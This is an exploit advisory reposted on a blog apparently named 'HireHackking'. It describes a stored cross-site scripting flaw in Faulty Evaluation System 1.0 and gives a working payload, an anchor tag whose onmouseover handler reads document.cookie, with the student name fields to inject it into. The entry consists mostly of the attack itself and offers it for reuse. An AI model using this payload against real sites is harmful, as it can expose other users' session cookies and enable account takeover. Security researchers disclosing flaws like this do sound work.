Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863107141

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting
# Date: 2021-02-16
# Exploit Author: Suresh Kumar
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14710/faulty-evaluation-system-using-phpcodeigniter-source-code.html
# Software: Faulty Evaluation System 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

# Vulnerable Page: http://localhost/evaluation/student/list
# Vulnerable functionality: 'Student'
# Vulnerable Input Field : {Firtstname} {Lastname} {Middle Name}
# Payload used:

<a onmouseover="alert(document.cookie)">xxs link</a>

# POC: Whenever we will go to the page (
http://localhost/evaluation/student/list) where the script is injected, the stored script will be executed.
# You will see your Javascript code (XSS) executed.